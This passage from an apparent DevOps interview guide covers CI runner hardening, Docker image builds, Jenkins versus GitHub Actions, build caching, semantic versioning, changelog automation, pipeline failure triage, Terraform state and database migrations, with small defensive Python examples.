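        exception = res.get("exception")
        if exception and date.fromisoformat(exception["expires"]) >= today:
            continue  # approved, unexpired exception: skip the check
        if res["type"] == "aws_s3_bucket" and res.get("acl") == "public-read":
            problems.append(
                f"{res['name']}: S3 bucket ACL is public-read; "
                "use a private ACL or request an exception"
            )
    return problems


# Fixtures: compliant, non-compliant, exempted, and expired-exception cases.
TODAY = date(2024, 6, 1)
compliant = {"type": "aws_s3_bucket", "name": "logs", "acl": "private"}
non_compliant = {"type": "aws_s3_bucket", "name": "assets", "acl": "public-read"}
exempted = {**non_compliant, "name": "legacy",
            "exception": {"ticket": "JIRA-1234", "expires": "2024-12-31"}}
expired = {**non_compliant, "name": "old",
           "exception": {"ticket": "JIRA-1234", "expires": "2024-01-31"}}

for fixture in (compliant, non_compliant, exempted, expired):
    print(fixture["name"], violations([fixture], TODAY))
```

The expired fixture is the important one: it checks that an exception stops working on its expiry date instead of silently becoming permanent.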
40. Hardening CI Environment
- Ephemeral runners (clean slate): Every job runs on a freshly provisioned runner that’s destroyed after the job. No state persists between jobs. A compromised job can’t poison the next job’s environment. Implementation: Kubernetes-based runners (new pod per job), EC2 spot instances that terminate after use, containerized runners.
- Network isolation: Runners shouldn’t have unrestricted internet access. Use VPC with restrictive security groups/egress rules. Allow-list only required endpoints: package registries, container registries, cloud APIs. Block all other outbound traffic. A compromised runner can’t exfiltrate data to an attacker’s server if outbound traffic is restricted.
- No privilege escalation: Runners should not run as root. Docker builds should use rootless Docker or Kaniko (builds images without Docker daemon). Never mount the Docker socket (`/var/run/docker.sock`): that gives the container full control of the host’s Docker daemon.
- Audit logs: Log every pipeline execution: who triggered it, what secrets were accessed, what was deployed, from which branch. Ship logs to a SIEM (Splunk, Elastic, Datadog). Alert on unusual patterns (production deploy from a feature branch, secret access at 3 AM, pipeline triggered by an unknown user).
- Dependency integrity: Pin CI action/step versions to commit SHAs. Verify checksums of downloaded tools. Use a dependency proxy/cache so you’re not pulling from the public internet during every build.
- Branch protection: Production deploy pipelines only run from protected branches (`main`, `release/*`). Feature branches can deploy to dev/staging but never to production. GitHub branch protection + required status checks + required reviews.
- Runner isolation by sensitivity: Different runner pools for different workloads. Open-source PRs (untrusted code) run on fully isolated runners with no secret access. Internal builds run on runners with scoped secret access. Production deploys run on highly restricted runners in a separate network.
- “A malicious PR could modify the CI workflow to exfiltrate secrets. How do you prevent this?” On GitHub Actions: use the `pull_request` trigger (not `pull_request_target`) for PR builds. For PRs from forks, `pull_request` runs the workflow from the PR but only with read access and no secrets. `pull_request_target` runs with the base branch’s workflow and secrets, which is dangerous if the PR can influence what runs. For Jenkins: use the `Jenkinsfile` from the trusted branch, not from the PR. For GitLab: use `rules` to restrict which jobs can access secrets based on the pipeline source (push to main vs. merge request from fork).
- “How do you implement runner auto-scaling while maintaining security?” Use Kubernetes-based runners with pod security standards. Each runner pod has restricted securityContext (non-root, read-only root filesystem, dropped capabilities). Network policies isolate runner pods from other cluster workloads. Auto-scaling is based on pending workflow queue depth, not CPU metrics (because you want runners to scale before jobs start waiting). Use node taints/tolerations to schedule runner pods on dedicated nodes, preventing co-location with production workloads.
- “How do you handle CI runner outage detection and recovery?” Monitor: runner availability (percentage of time runners are available for jobs), queue wait time (time jobs spend waiting for a runner), job failure rate due to infrastructure issues (vs code issues). Alert if queue wait time exceeds 5 minutes (runners aren’t scaling fast enough) or if failure rate spikes (runner infrastructure issue). Use multiple availability zones for runners. Have a fallback to SaaS runners if self-hosted runners are unavailable. Implement health checks on runner registration — if a runner becomes unresponsive, deregister it and schedule a replacement.
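The "verify checksums of downloaded tools" item from the hardening list can be done with the standard library alone. This is a minimal sketch, assuming the expected SHA-256 comes from a trusted source such as the vendor's published checksum file; the function names and the stand-in file contents are made up for the example.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_checksum(path: Path, expected_hex: str) -> bool:
    """Compare the file's SHA-256 with the published value."""
    return hmac.compare_digest(sha256_of(path), expected_hex.strip().lower())


# Demo with a stand-in "downloaded tool" written to a temporary directory.
with tempfile.TemporaryDirectory() as tmp_dir:
    tool = Path(tmp_dir) / "tool.bin"
    tool.write_bytes(b"pretend this is a downloaded binary")
    published = hashlib.sha256(b"pretend this is a downloaded binary").hexdigest()
    print(verify_checksum(tool, published))   # matching checksum
    print(verify_checksum(tool, "0" * 64))    # tampered or wrong file
```

In a pipeline, a `False` result should fail the job before the tool is ever executed.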
5. Tools & Troubleshooting
41. Docker in Docker (DinD)
Docker-in-Docker (DinD):
- Requires `--privileged` mode (grants the container nearly full host kernel access).
- Security risk: a container escape from the privileged container gives full host access. This is the most dangerous approach.
- Use case: when you need a completely isolated Docker environment (multi-tenant CI where you don’t want tenants sharing a Docker daemon).

Socket mounting: mount the host’s Docker socket (`/var/run/docker.sock`) into the CI container. The CI container uses the host’s Docker daemon.
- No `--privileged` needed.
- Security risk: the container can execute any Docker command on the host, including accessing other containers, reading their data, or running privileged containers. Effectively root access on the host.
- Performance: better than DinD because it shares the host’s build cache.
- Use case: trusted CI environments where performance matters.

Kaniko:
- No `--privileged`, no Docker socket.
- Runs as an unprivileged container.
- Limitations: doesn’t support all Dockerfile features (multi-stage builds work, but some exotic features don’t). Build caching is different (uses registry-based cache, not local daemon cache).
- Use case: Kubernetes-based CI where security is paramount. This is the recommended approach for most modern setups.
- Buildah: OCI-compliant image builder, daemonless. Can run rootless. More feature-complete than Kaniko.
- BuildKit (with rootless mode): Docker’s next-generation builder. Can run without root privileges.
- Podman: Daemonless, rootless alternative to Docker. Compatible CLI interface.
- “Your CI builds Docker images on Kubernetes. How do you set it up securely?” Use Kaniko as a sidecar or init container. The CI job creates a `kaniko-executor` container with the Dockerfile and build context mounted as a volume. Kaniko builds the image and pushes to the registry without needing Docker. No privileged mode, no socket mounting. For caching, configure Kaniko to use a registry-based cache (`--cache=true --cache-repo=myregistry/cache`). This is the setup used by GitLab CI on Kubernetes and recommended by most Kubernetes security guides.
- “What’s the performance difference between DinD, socket mounting, and Kaniko?” Socket mounting is fastest because it shares the host’s build cache (layers are reused immediately). DinD is slower because the inner daemon has its own cache (cold on first build). Kaniko is comparable to DinD for first builds, but with registry-based caching, subsequent builds pull cached layers from the registry (network latency vs local disk). In practice, the performance difference is 10-30 seconds per build, which is rarely the bottleneck and is small compared to the security risk.
- “Can you run Docker Compose in CI for integration tests?” Yes, but it requires Docker-in-Docker or socket mounting (Compose needs a Docker daemon). For Kubernetes-based CI, alternatives: use Testcontainers (programmatically start containers via the API; works with DinD or socket), or use Kubernetes manifests/Helm to deploy the test dependencies as pods in the CI namespace. Some teams run a dedicated “integration test” environment with pre-deployed dependencies and the CI job just runs tests against it.
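For the Kaniko setup described above, the executor is driven entirely by command-line flags, so a CI job template can assemble them from a few inputs. The helper below is a hypothetical sketch that only builds the argument list (it does not start a container); the paths and registry names are placeholders.

```python
from typing import Optional


def kaniko_args(
    context_dir: str,
    dockerfile: str,
    destination: str,
    cache_repo: Optional[str] = None,
) -> list[str]:
    """Build the argument list for a Kaniko executor container."""
    args = [
        f"--context=dir://{context_dir}",  # build context mounted as a volume
        f"--dockerfile={dockerfile}",
        f"--destination={destination}",    # image is pushed here after the build
    ]
    if cache_repo:
        # Registry-based layer cache, since there is no local Docker daemon cache.
        args += ["--cache=true", f"--cache-repo={cache_repo}"]
    return args


# Placeholder values for illustration.
print(kaniko_args(
    context_dir="/workspace",
    dockerfile="/workspace/Dockerfile",
    destination="myregistry/myapp:latest",
    cache_repo="myregistry/cache",
))
```

The resulting list would go into the `args` of the executor container in the job's pod spec, with no `privileged` setting and no socket mount.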
42. Jenkins vs GitHub Actions
- Jenkins:
  - Architecture: Self-hosted controller + agents. Controller orchestrates, agents execute. Java-based (JVM). Runs on your infrastructure.
  - Configuration: Groovy-based `Jenkinsfile` (declarative or scripted). Extensive plugin ecosystem (1,800+ plugins), but plugin quality varies wildly, and incompatible plugin updates are the #1 source of Jenkins outages.
  - Strengths: Maximum flexibility. Can do anything (literally anything: it’s a programmable build server). Massive community. Battle-tested for 15+ years. No vendor lock-in. Great for complex enterprise pipelines with custom requirements.
  - Weaknesses: Maintenance burden is significant. Plugin hell: updating one plugin breaks another. Scaling requires managing agents (VMs, Kubernetes pods). The UI is dated. Security vulnerabilities in plugins are frequent. “Works on my Jenkins” is a real problem when every Jenkins installation is unique.
  - Cost model: Infrastructure + engineering time for maintenance. A team needs ~0.5 FTE to keep Jenkins healthy at scale.
- GitHub Actions:
  - Architecture: SaaS runners (GitHub-hosted) or self-hosted runners. YAML-based workflow files in `.github/workflows/`. Event-driven (push, PR, schedule, webhook).
  - Configuration: YAML. Reusable workflows. Marketplace of community actions (6,000+). Matrix builds for testing across versions/OS.
  - Strengths: Zero infrastructure (SaaS). Deep GitHub integration (auto-triggered on PR, status checks, deployments). Marketplace ecosystem. Easy to start. Great documentation.
  - Weaknesses: Vendor lock-in to GitHub. YAML can become complex for large pipelines. Debugging is harder (can’t SSH into a failed runner by default, though the `tmate` action helps). Limited feature set compared to Jenkins (no dynamic pipeline generation, limited pipeline orchestration). Billing can be expensive at scale.
  - Cost model: Pay per minute for hosted runners. Free tier for public repos. Self-hosted runners are free (you pay for infra).
| Factor | Jenkins | GitHub Actions |
|---|---|---|
| Already on GitHub? | Overhead | Natural fit |
| Complex enterprise pipelines? | Strong | Limited |
| Team size for CI maintenance? | 0.5+ FTE | Minimal |
| Compliance (air-gapped, on-prem)? | Works | Needs self-hosted |
| Open-source projects? | Overkill | Ideal |
- “Your company uses Jenkins and wants to migrate to GitHub Actions. How do you approach it?” Don’t big-bang migrate. Start with new projects on GitHub Actions. Run both systems in parallel. Migrate existing pipelines gradually, starting with the simplest (lint/test) and ending with the most complex (production deployments). Identify Jenkins-specific features you depend on (custom plugins, dynamic pipeline generation, shared libraries) and find GitHub Actions equivalents or workarounds. Set a sunset date for Jenkins after all critical pipelines are migrated. Budget 3-6 months for a team of 50 developers.
- “What about GitLab CI, CircleCI, or other alternatives?” GitLab CI is excellent if you’re already on GitLab (tightest integration, included in the platform, powerful `include` and `extends` features). CircleCI is strong for complex pipeline orchestration (workflows, workspaces, orbs). Buildkite is great for teams that want hosted orchestration but self-hosted agents (common in security-conscious organizations). The right tool depends on your existing SCM platform, security requirements, and pipeline complexity.
- “Can you use both Jenkins and GitHub Actions in the same organization?” Yes, and it’s common during migrations. Use GitHub Actions for PR checks (lint, test, security scan) and Jenkins for complex deployment pipelines. Trigger Jenkins from GitHub Actions via webhook. This gives you GitHub’s PR integration with Jenkins’s deployment flexibility. Long-term, you want to consolidate to reduce maintenance overhead, but this hybrid approach works during transitions.
43. Build Caching
- Dependency caching: Cache `node_modules/`, `.m2/repository`, `~/.cache/pip`, `vendor/`. Avoids re-downloading packages on every build. Cache key: hash of the lockfile (`hashFiles('package-lock.json')`). When the lockfile changes, the cache is invalidated. GitHub Actions: `actions/cache`, built-in for `setup-node` with `cache: 'npm'`. Savings: 30 seconds to 5 minutes per build.
- Docker layer caching: Docker builds layers incrementally. If a layer’s inputs haven’t changed, reuse the cached layer. `COPY package.json .` followed by `RUN npm install` is cached until `package.json` changes. Layer ordering matters: put frequently-changing instructions (COPY source code) after rarely-changing instructions (install dependencies). For CI: use BuildKit inline cache (`--cache-from`), registry-based cache (`--cache-to type=registry`), or GitHub Actions cache backend.
- Build output caching: Cache compiled outputs. Go’s build cache (`~/.cache/go-build`), Gradle’s build cache (`.gradle/caches`), Webpack’s persistent cache. Savings: minutes for large compilations.
- Test result caching: Some tools cache test results and skip re-running tests whose inputs haven’t changed. Nx, Turborepo, Bazel all support this. `nx affected --target=test` only runs tests for changed projects.
- Remote caching: Share caches across developers and CI runners. Turborepo Remote Cache, Nx Cloud, Gradle Build Cache (remote). Developer A builds locally; Developer B and CI reuse A’s cache. This is the biggest win for monorepos: unchanged packages are not rebuilt anywhere across the team.
CACHE_VERSION variable in the workflow).
Red flag answer: “We cache everything,” without mentioning cache invalidation strategy, correctness concerns, or key design. A bad cache key means builds use stale dependencies and produce subtle bugs that are hellish to debug.
Follow-up:
- “Your cache hit rate is 40%. How do you improve it?” Analyze cache misses: are the keys too specific (changing on every build)? Is the cache being evicted due to size limits? GitHub Actions has a 10GB cache limit per repo, and large `node_modules` caches fill this quickly. Solutions: use more stable cache keys (hash of lockfile, not of all source files), use a restore key that falls back to a partial match, increase cache storage (self-hosted caching with S3), compress caches before storing.
- “How do you handle cache poisoning in CI?” A malicious PR could modify cached content (e.g., inject code into cached `node_modules`). Mitigations: use content-addressed caching (the cache key includes the hash of inputs, so modified content gets a different key), isolate PR caches from main branch caches (GitHub Actions does this by default: PR caches can read from main but can’t write to main), and clear caches periodically. For self-hosted caching, ensure the cache storage has integrity verification.
- “Docker layer caching doesn’t work in CI. What’s wrong?” Common causes: (1) the CI runner is ephemeral and the local Docker cache is empty. Solution: use `--cache-from` to pull cached layers from the registry. (2) Build arguments or secrets change between builds, invalidating layers early. Solution: put argument-dependent instructions late in the Dockerfile. (3) A `COPY . .` instruction early in the Dockerfile invalidates everything when any source file changes. Solution: copy dependency manifests first, install dependencies, then copy source code. (4) Using `docker build` instead of BuildKit. Solution: `DOCKER_BUILDKIT=1 docker build` or `docker buildx build`.
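The lockfile-hash key and restore-key fallback described in this section can be sketched in a few lines. This is only an illustration of the idea, not how `actions/cache` is implemented; the function names `cache_keys` and `lookup` and the `deps-<os>-<hash>` key layout are assumptions made for the example.

```python
import hashlib
from typing import List, Optional, Tuple


def cache_keys(lockfile_bytes: bytes, os_name: str, prefix: str = "deps") -> Tuple[str, List[str]]:
    """Build a primary cache key from the lockfile hash, plus fallback prefixes."""
    digest = hashlib.sha256(lockfile_bytes).hexdigest()[:16]
    primary = f"{prefix}-{os_name}-{digest}"
    # Restore keys are prefixes: any older cache for the same OS is a partial hit.
    restore = [f"{prefix}-{os_name}-"]
    return primary, restore


def lookup(existing: List[str], primary: str, restore: List[str]) -> Optional[str]:
    """Return the exact key if present, else the newest key matching a restore prefix."""
    if primary in existing:
        return primary
    for pfx in restore:
        matches = [k for k in existing if k.startswith(pfx)]
        if matches:
            return matches[-1]  # assumes `existing` is ordered oldest to newest
    return None
```

Because the key changes only when the lockfile bytes change, edits to source files never invalidate the dependency cache, and a changed lockfile still gets a warm start from the previous cache through the prefix match.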
44. Semantic Versioning
MAJOR.MINOR.PATCH format to communicate the nature of changes:
- MAJOR (1.0.0 -> 2.0.0): Breaking changes. The API contract changed in a way that existing consumers will break. Removing a field, changing a return type, renaming an endpoint. Consumers must update their code.
- MINOR (1.0.0 -> 1.1.0): New functionality, backward-compatible. New endpoints, new optional fields, new features. Existing consumers continue to work without changes.
- PATCH (1.0.0 -> 1.0.1): Bug fixes, backward-compatible. No new features. Security patches. Performance improvements.
- `1.0.0-alpha.1`, `1.0.0-beta.3`, `1.0.0-rc.1`: Pre-release versions. Sort order: `alpha < beta < rc < release`.
- `1.0.0+build.123`: Build metadata (ignored in version precedence).
- “We’re on 0.x.y so breaking changes are fine.” Technically yes (SemVer says `0.x.y` is for initial development), but if you have external consumers, treat `0.MAJOR.MINOR` as `MAJOR.MINOR.PATCH` in practice. Breaking changes on every minor version frustrates users.
- “We bump major on every release.” This isn’t SemVer. If every release is a major version, the version number carries no information about compatibility.
- “We auto-increment patch on every build.” This conflates build numbers with version numbers. Version numbers have semantic meaning; build numbers don’t.
`feat:` -> bump minor, `fix:` -> bump patch, `feat!:` or `BREAKING CHANGE:` -> bump major). Tools: semantic-release, release-please, standard-version. CI reads commit messages since the last release and automatically determines the next version, creates a tag, generates a changelog, and publishes the release. This removes human judgment (and error) from versioning.
Red flag answer: “We just increment the version when we feel like it.” Versioning without a consistent strategy confuses consumers and makes dependency management unpredictable.
Follow-up:
- “How does SemVer work for services (not libraries)?” SemVer was designed for libraries with explicit API contracts. For services, it’s less clear who the “consumer” is. Some teams use SemVer for the API version (external-facing) and date-based versioning (`2024.01.15`) or git SHAs for the deployment version (internal). The key: the API version communicates compatibility to consumers, the deployment version identifies the specific build for debugging.
- “How do you handle a breaking change that you want to introduce gradually?” Use API versioning (`/v1/users`, `/v2/users`). Introduce v2 with the breaking change while keeping v1 working. Communicate a deprecation timeline (v1 will be removed in 6 months). Monitor v1 usage. Send deprecation warnings in v1 responses (`Deprecation: true` header). Remove v1 when usage drops to zero (or an acceptable level). Never surprise consumers with breaking changes.
- “What’s CalVer and when would you use it over SemVer?” Calendar Versioning uses date-based versions (`2024.01`, `24.1.0`). Good for: projects that release on a fixed schedule (Ubuntu 24.04), projects where “backward compatibility” isn’t meaningful (OS distributions, infrastructure tools), or projects where the date is more useful than the change type. pip uses CalVer (for example `24.0`), and Docker adopted a `YY.MM` scheme starting with 17.03. For libraries consumed by other code, SemVer is better because it communicates compatibility.
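The precedence rules mentioned above (pre-releases sort before the release, build metadata is ignored) can be made concrete with a small comparator. This is a minimal sketch following the SemVer 2.0.0 precedence rules; the function names are illustrative, and a maintained library is a better fit for real projects.

```python
import re
from functools import cmp_to_key

_SEMVER = re.compile(
    r"^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$"
)


def parse(version):
    """Split a version into its numeric core and pre-release identifiers."""
    m = _SEMVER.match(version)
    if not m:
        raise ValueError(f"not a SemVer string: {version!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch)), (pre.split(".") if pre else [])


def _cmp_ident(a, b):
    # Numeric identifiers compare as numbers and rank below alphanumeric ones.
    if a.isdigit() and b.isdigit():
        return (int(a) > int(b)) - (int(a) < int(b))
    if a.isdigit():
        return -1
    if b.isdigit():
        return 1
    return (a > b) - (a < b)


def compare(a, b):
    """Return -1, 0, or 1; build metadata after '+' never affects the result."""
    core_a, pre_a = parse(a)
    core_b, pre_b = parse(b)
    if core_a != core_b:
        return -1 if core_a < core_b else 1
    if not pre_a or not pre_b:
        # A version without a pre-release tag outranks one with a tag.
        return bool(pre_b) - bool(pre_a)
    for x, y in zip(pre_a, pre_b):
        c = _cmp_ident(x, y)
        if c:
            return c
    return (len(pre_a) > len(pre_b)) - (len(pre_a) < len(pre_b))
```

Sorting with `sorted(versions, key=cmp_to_key(compare))` orders `1.0.0-alpha.1`, `1.0.0-beta.3`, `1.0.0-rc.1`, `1.0.0` as listed, and `1.0.0-alpha.2` sorts before `1.0.0-alpha.10` because numeric identifiers are compared as numbers rather than strings.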
45. Changelog Generation
- Types: `feat` (new feature), `fix` (bug fix), `docs` (documentation), `style` (formatting), `refactor`, `perf` (performance), `test`, `chore` (maintenance), `ci` (CI changes).
- Breaking changes: Add `!` after the type (`feat!: remove legacy endpoint`) or add `BREAKING CHANGE:` in the footer.
- Scope: Optional context (`feat(auth): add SSO support`, `fix(payments): correct rounding error`).
- Developers write Conventional Commits.
- CI lints commit messages (commitlint, also run locally from a Husky `commit-msg` hook). Rejects `"fixed stuff"` and `"WIP"`.
- On merge to main, a release tool (semantic-release, release-please) reads commit messages since the last release.
- Determines the version bump: any `BREAKING CHANGE` = major, otherwise any `feat` = minor, otherwise only `fix` commits = patch.
- Generates changelog: groups changes by type, links to PRs/issues.
- Creates a Git tag and GitHub Release with the changelog.
- Publishes the package (npm, PyPI, Docker).
- “How do you enforce Conventional Commits across a team?” Use commitlint from a `commit-msg` Git hook (Husky for JS, the pre-commit framework for Python). The hook checks that every commit message matches the Conventional Commits format before allowing the commit. For squash-merge workflows, lint the PR title instead (GitHub Actions can run commitlint against the PR title). Provide a `git cz` (Commitizen) CLI that walks developers through writing a properly formatted commit message interactively. Start with education: show the team the generated changelog and explain how their commit messages become user-facing release notes.
- “What’s the difference between semantic-release and release-please?” semantic-release: fully automated, runs on every merge to main, creates releases immediately. Best for libraries and packages that should be released continuously. release-please: creates a “release PR” that accumulates changes. A human merges the release PR to trigger the actual release. Best for applications where you want to batch changes and control release timing. Both read Conventional Commits, both generate changelogs, both create Git tags.
- “How do you handle commits that don’t fit Conventional Commits?” Use `chore:` as a catch-all for maintenance tasks that don’t appear in the changelog. Most changelog generators exclude `chore`, `docs`, `style`, `test`, and `ci` types from the user-facing changelog (they’re still in Git history). For “misc” changes, the team should ask: “Is this a feature, a fix, or maintenance?” One of those three always applies. If developers resist Conventional Commits, the problem is usually friction, so provide tooling (Commitizen, IDE templates) that makes it as easy as free-form messages.
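To make the bump rules concrete, here is a rough sketch of how a release tool might derive the next version from commit messages. It is a simplified illustration, not the actual logic of semantic-release or release-please; the helper names are made up for the example.

```python
import re

_HEADER = re.compile(
    r"^(?P<type>[a-z]+)(?:\((?P<scope>[^)]+)\))?(?P<bang>!)?: (?P<desc>.+)$"
)
_RANK = {"patch": 1, "minor": 2, "major": 3}


def parse_commit(message):
    """Parse a Conventional Commit; return None if the header does not match."""
    lines = message.strip().splitlines()
    m = _HEADER.match(lines[0]) if lines else None
    if not m:
        return None
    breaking = bool(m.group("bang")) or any(
        line.startswith("BREAKING CHANGE:") for line in lines[1:]
    )
    return {"type": m.group("type"), "scope": m.group("scope"),
            "desc": m.group("desc"), "breaking": breaking}


def next_bump(messages):
    """Return 'major', 'minor', 'patch', or None when nothing is releasable."""
    bump = None
    for msg in messages:
        commit = parse_commit(msg)
        if commit is None:
            continue  # a linter would have rejected this message earlier
        if commit["breaking"]:
            level = "major"
        elif commit["type"] == "feat":
            level = "minor"
        elif commit["type"] == "fix":
            level = "patch"
        else:
            continue  # chore, docs, ci, etc. do not trigger a release
        if bump is None or _RANK[level] > _RANK[bump]:
            bump = level
    return bump


def bump_version(version, bump):
    """Apply a bump level to a plain MAJOR.MINOR.PATCH string."""
    major, minor, patch = (int(p) for p in version.split("."))
    if bump == "major":
        return f"{major + 1}.0.0"
    if bump == "minor":
        return f"{major}.{minor + 1}.0"
    if bump == "patch":
        return f"{major}.{minor}.{patch + 1}"
    return version
```

The highest-ranked change wins, so a single breaking commit in a batch of fixes still produces a major bump, while a batch of only `chore` commits produces no release at all.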
46. Why did the pipeline fail?
- `ENOSPC`: disk full. Runner ran out of disk space (Docker images, build artifacts).
- `OOMKilled`: out of memory. The build or test consumed more memory than the runner has.
- `ETIMEDOUT` / `Connection refused`: network issue. Can’t reach a registry, database, or external service.
- `Permission denied`: IAM role missing, file permissions wrong, Docker socket not accessible.
- `Exit code 1` in a test step: a test failed (not an infra issue, a code issue).
- Code failure: A test failed, a build error, a type error. The fix is in the code. `git diff` between the last green run and this one to see what changed.
- Environment failure: The runner is different, an env var is missing, a dependency is unavailable. Compare the failing run’s environment with a successful one.
- Infrastructure failure: Registry is down, runner can’t start, network partition. Check status pages, infrastructure dashboards.
- Flakiness: The same code passed on the previous run. Check flake history for this test. Re-run to confirm. If it passes on retry, it’s flaky (fix the root cause, don’t just retry forever).
`docker run` the same image with the same commands. If it works locally but fails in CI, the difference is the environment: OS version, installed tools, network access, environment variables, runner resource limits.
Step 4: Check recent changes. What changed since the last green build? `git log --oneline HEAD~5..HEAD`. Was a dependency updated? Did the pipeline YAML change? Did an infrastructure change happen (Terraform apply, Kubernetes upgrade)?
Step 5: Check for external factors. Is an external service down (GitHub, Docker Hub, npm registry)? Is it a rate limit? Is it a certificate expiration? Check provider status pages.
Red flag answer: “I just re-run the pipeline and it usually works.” This masks real issues. If re-running works, it’s a flaky test or an intermittent infrastructure issue, and both need root cause analysis.
Follow-up:
- “The pipeline has been failing intermittently for 3 days. No one can reproduce it locally. How do you investigate?” Correlate: when does it fail? Time of day? Specific runners? Specific test files? Run the test suite with verbose logging on CI. If it’s a specific test, instrument it with additional debug output. Check if the runner’s resource usage hits limits during the failure window (CPU throttling, memory pressure). Check if the failure correlates with other teams’ pipelines running concurrently (shared resource contention). Enable `set -x` in shell steps to see exactly what commands execute. If it’s a network issue, add connectivity checks before the failing step.
- “A pipeline that takes 20 minutes suddenly takes 90 minutes. No code changes. What happened?” Check: (1) Is caching broken? A cache miss forces full dependency download and rebuild. Check cache hit/miss logs. (2) Did a dependency update happen? `npm install` might be resolving a newer, slower version. Check lockfile changes. (3) Is the runner slower? Cloud providers sometimes move you to older hardware. Check runner specs. (4) Is a downstream service slow? Integration tests hitting a degraded database. Check downstream latency. (5) Did test parallelism change? If matrix builds reduced or sharding changed, tests run sequentially instead of in parallel.
- “How do you prevent pipeline failures from blocking the entire team?” Separate concerns: run fast, high-confidence checks (lint, build, unit tests) as required status checks on PRs. Run slow, lower-confidence checks (E2E, performance, security scans) as non-blocking or post-merge. Use merge queues (GitHub Merge Queue) to prevent broken code from reaching main. If main is broken, prioritize the fix as a P0, because a broken main blocks everyone. Some teams have a “build cop” rotation where one engineer monitors and fixes pipeline failures for the week.
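The first triage step, matching the log against known failure signatures, is easy to automate. The sketch below is a toy classifier built only from the patterns listed in this section; the category names and the `classify` function are hypothetical, and real logs will need more signatures than these.

```python
# Ordered from most specific to least: the first matching category wins.
SIGNATURES = [
    ("disk_full", ("ENOSPC",)),
    ("out_of_memory", ("OOMKilled",)),
    ("network", ("ETIMEDOUT", "Connection refused")),
    ("permissions", ("Permission denied",)),
    ("test_or_build_failure", ("Exit code 1",)),
]


def classify(log_text):
    """Return a coarse failure category for a CI log, or 'unknown'."""
    for category, needles in SIGNATURES:
        if any(needle in log_text for needle in needles):
            return category
    return "unknown"
```

Infrastructure signatures are checked before the generic exit code on purpose: a step that ran out of disk usually also exits non-zero, and the more specific cause is the one worth surfacing.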
47. Terraform State in CI
.tf configuration and the real-world resources. It contains resource IDs, IP addresses, and often sensitive data (database passwords, API keys). Managing state correctly is critical for safe infrastructure automation.
Why state must be remote (never in Git):
- State contains sensitive information (even with Terraform’s attempts to mark things sensitive, connection strings, passwords, and IPs leak into state).
- Multiple engineers running `terraform apply` with local state create conflicts and resource drift.
- CI pipelines need a shared, consistent view of state.
- S3 + DynamoDB (AWS): State stored in an S3 bucket (encrypted, versioned), locking via DynamoDB table. This prevents two `terraform apply` commands from running concurrently and corrupting state.
- GCS + locking (GCP): Google Cloud Storage with built-in locking.
- Terraform Cloud/Enterprise: Hosted state management with built-in locking, encryption, RBAC, and audit logs.
- Azure Blob Storage: With state locking via blob lease.
- PR pipeline: `terraform init` -> `terraform plan -out=tfplan` -> post plan output as a PR comment. Reviewers see exactly what will change (“3 resources to add, 1 to modify, 0 to destroy”).
- Merge to main: `terraform apply -auto-approve` (with the plan from step 1 as input, `terraform apply tfplan`). This ensures the applied plan is exactly what was reviewed.
- Locking: DynamoDB lock prevents concurrent applies. If two merges happen simultaneously, the second waits for the first’s lock to release.
- State bucket: encrypted at rest, versioned (rollback on state corruption), access restricted to CI role only. No human access.
- State locking: prevents concurrent modifications. Without locking, two applies can create orphaned resources or partial infrastructure.
- Sensitive outputs: use `sensitive = true` and ensure CI logs don’t print plan output with sensitive values in plain text.
- “Terraform state becomes corrupted or out of sync. How do you recover?” S3 versioning lets you restore a previous state version. `terraform state pull` downloads current state for inspection. `terraform state rm` removes a resource from state without destroying it (useful if a resource was manually deleted). `terraform import` brings manually-created resources into state. For severe corruption, restore from the last known-good S3 version and run `terraform plan` to identify drift. Never edit state files manually unless you truly understand the format.
- “How do you handle state for multiple environments (dev, staging, prod)?” Separate state files per environment. Options: (1) Terraform workspaces (`terraform workspace select prod`): simple, but all environments share the same backend configuration. (2) Separate backend configurations per environment (`-backend-config` flag or separate `.tfvars` files). (3) Directory-based separation (`envs/dev/`, `envs/staging/`, `envs/prod/`, each with their own state). Option 3 is most common because it provides the clearest separation and makes it impossible to accidentally apply dev configuration to prod.
- “How do you prevent a developer from running `terraform destroy` in production from the CI pipeline?” Use IAM role restrictions: the CI role for prod cannot call `ec2:TerminateInstances` or `rds:DeleteDBInstance`. Use Sentinel/OPA policies that reject plans with `destroy` actions for production workspaces. Require manual approval (environment protection rules in GitHub Actions) before any production Terraform apply. Use `prevent_destroy` lifecycle rules on critical resources in the Terraform config itself. Log every `terraform apply` with the plan output to an audit trail.
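A lightweight version of the "reject plans with destroy actions" policy can run as a pipeline step against the JSON form of a saved plan (`terraform show -json tfplan`). The sketch below assumes that JSON has already been captured as a string; `destructive_changes` is an illustrative helper, not a Sentinel or OPA policy.

```python
import json
from typing import List


def destructive_changes(plan_json: str) -> List[str]:
    """List resource addresses whose planned actions include a delete.

    Replacements appear as ["delete", "create"] or ["create", "delete"],
    so they are reported as destructive too.
    """
    plan = json.loads(plan_json)
    return [
        rc["address"]
        for rc in plan.get("resource_changes", [])
        if "delete" in rc.get("change", {}).get("actions", [])
    ]
```

A production job could fail the build whenever the returned list is non-empty and require an explicit override label on the PR; that override mechanism is a design choice left to the team, not something Terraform provides.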
48. Handling Database Migrations
- Migration scripts are version-controlled alongside application code.
- Migrations run as a pre-deployment step, before the new application version starts. In Kubernetes, this is typically a Job or init container. In ArgoCD, a `PreSync` hook. In Helm, a pre-upgrade hook.
- The migration tool tracks which migrations have been applied (a `schema_migrations` table in the database). It only runs new, unapplied migrations.
- Safe operations: Adding a column with a default, adding a table, adding an index (concurrently in Postgres), adding a nullable column.
- Unsafe operations: Dropping a column (old code references it), renaming a column (old code references old name), changing a column type (old code expects old type), adding a NOT NULL column without a default (old rows violate the constraint).
- Expand: Add the new column/table. Deploy code that writes to both old and new columns. No old columns removed.
- Migrate data: Backfill the new column from old data. Run as a background job, not blocking the deploy.
- Contract: After all code is on the new version and the old column is unused, remove it in a subsequent deploy.
